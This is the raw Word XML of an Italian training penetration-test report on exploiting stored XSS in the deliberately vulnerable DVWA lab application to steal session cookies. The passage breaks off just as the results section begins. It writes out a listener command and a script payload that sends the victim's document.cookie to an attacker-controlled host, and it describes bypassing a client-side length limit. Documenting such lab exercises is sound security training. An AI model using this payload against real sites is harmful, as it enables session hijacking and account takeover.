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120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">REPORT DI PENETRATION TEST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="534AB7"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit XSS Persistente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="260"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26215C"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">e Furto di Sessione su Web Application DVWA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="CECBF6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="26215C"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Data Defender</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cybersecurity &amp; Ethical Hacking — Build Week 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Traccia Giorno 2 — Web Application Exploit XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">27 luglio 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Sintesi esecutiva</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il presente report documenta l'attività di test condotta dal team </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Data Defender</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sulla web application volutamente vulnerabile </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, in ambiente di laboratorio isolato. Obiettivo dell'esercizio: sfruttare una vulnerabilità di </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting (XSS) persistente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per simulare il furto della sessione di un utente legittimo, inoltrando i cookie sottratti a un web server sotto il controllo dell'attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'attività ha avuto pieno successo. È stato possibile iniettare uno script malevolo nella bacheca dei commenti, sottrarre il cookie di sessione (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) di un utente che visita la pagina e, riutilizzando tale cookie, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">impersonare l'utente amministratore senza conoscerne le credenziali</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. L'attacco è stato replicato con successo sia al livello di sicurezza LOW sia al livello MEDIUM, aggirandone i filtri.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="FCEBEB" w:sz="2"/>
          <w:bottom w:val="single" w:color="FCEBEB" w:sz="2"/>
          <w:left w:val="single" w:color="A32D2D" w:sz="26" w:space="12"/>
          <w:right w:val="single" w:color="FCEBEB" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="FCEBEB" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="A32D2D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Severità complessiva: ALTA.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vulnerabilità XSS persistente che consente il furto di sessione porta al completo compromesso dell'account della vittima (account takeover), senza interazione consapevole da parte di quest'ultima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Ambito e ambiente di test</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tutte le attività sono state svolte in un laboratorio virtuale isolato, su bersagli di proprietà e con autorizzazione esplicita, senza alcun impatto su sistemi terzi.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9100"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:left w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:bottom w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:right w:val="single" w:color="D3D1C7" w:sz="2"/>
          <w:insideH w:val="single" w:color="E5E3DB" w:sz="2"/>
          <w:insideV w:val="single" w:color="E5E3DB" w:sz="2"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3200"/>
        <w:gridCol w:w="5900"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Applicazione bersaglio</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DVWA — Damn Vulnerable Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnerabilità testata</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stored (Persistent) Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Livelli di sicurezza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LOW e MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Macchina attaccante (Kali)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.104.100/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Macchina bersaglio (Metasploitable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.104.150/24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="EEEDFE" w:color="auto" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="26215C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web server di raccolta cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">in ascolto sulla porta </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Traccia dell'esercizio e requisiti di laboratorio (Giorno 2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Metodologia e catena d'attacco</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">L'attacco sfrutta il fatto che la bacheca dei commenti di DVWA salva e ripropone a tutti i visitatori il contenuto inviato dagli utenti. Poiché tale contenuto non viene adeguatamente neutralizzato, uno script iniettato viene eseguito nel browser di chiunque apra la pagina. La catena si articola in cinque fasi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="1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552825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Catena d'attacco: iniezione, salvataggio persistente, esecuzione nel browser della vittima ed esfiltrazione del cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Iniezione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l'attaccante inserisce nella bacheca uno script che legge il cookie della vittima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Persistenza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il server salva lo script, che viene riproposto a ogni visita successiva.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esecuzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: la vittima apre la pagina e il suo browser esegue lo script a sua insaputa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Esfiltrazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il cookie di sessione viene inviato al web server dell'attaccante.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="100" w:line="278"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impersonificazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l'attaccante riutilizza il cookie per accedere come la vittima.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Descrizione della vulnerabilità</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Il </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting persistente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (o Stored XSS) si verifica quando un'applicazione memorizza input non sanificato proveniente dagli utenti e lo restituisce in pagina senza codificarlo, permettendo l'esecuzione di codice JavaScript arbitrario nel contesto del sito. A differenza dell'XSS riflesso, la variante persistente non richiede di indurre la vittima a cliccare un link malevolo: è sufficiente che visiti una pagina legittima del sito, il che ne amplifica notevolmente l'impatto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="FAEEDA" w:sz="2"/>
          <w:bottom w:val="single" w:color="FAEEDA" w:sz="2"/>
          <w:left w:val="single" w:color="854F0B" w:sz="26" w:space="12"/>
          <w:right w:val="single" w:color="FAEEDA" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="FAEEDA" w:color="auto" w:val="clear"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="854F0B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Causa tecnica.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Nel campo commento (livello LOW) l'input viene salvato e ristampato senza alcuna codifica; inoltre il cookie di sessione non è protetto dal flag HttpOnly, risultando quindi leggibile via JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="26215C"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Sfruttamento — Livello LOW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="534AB7"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Preparazione del web server di raccolta</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sulla macchina attaccante è stato avviato un web server in ascolto sulla porta 4444, che registra ogni richiesta in arrivo (indirizzo IP, data/ora e parametri):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="22" w:space="10"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="150" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 4444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="534AB7"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Payload iniettato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nel campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Message</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> della bacheca XSS (Stored) è stato inserito il seguente script. Il campo presentava un limite di caratteri lato client (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">maxlength</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), rimosso tramite gli strumenti di sviluppo del browser — un controllo puramente estetico, privo di valore di sicurezza. La validazione che imponeva un nome non vuoto è stata soddisfatta compilando il campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">Name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="534AB7" w:sz="22" w:space="10"/>
        </w:pBdr>
        <w:shd w:fill="F1EFE8" w:color="auto" w:val="clear"/>
        <w:spacing w:after="150" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2C2C2A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;new Image().src="http://192.168.104.100:4444/?c="+document.cookie;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="140"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="57150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762375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5F5E5A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Rimozione del limite maxlength lato client e validazione del campo Name.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="534AB7"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3 Esito: cookie esfiltrato</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="130" w:line="278"/>
        <w:jc w:val="both"/>
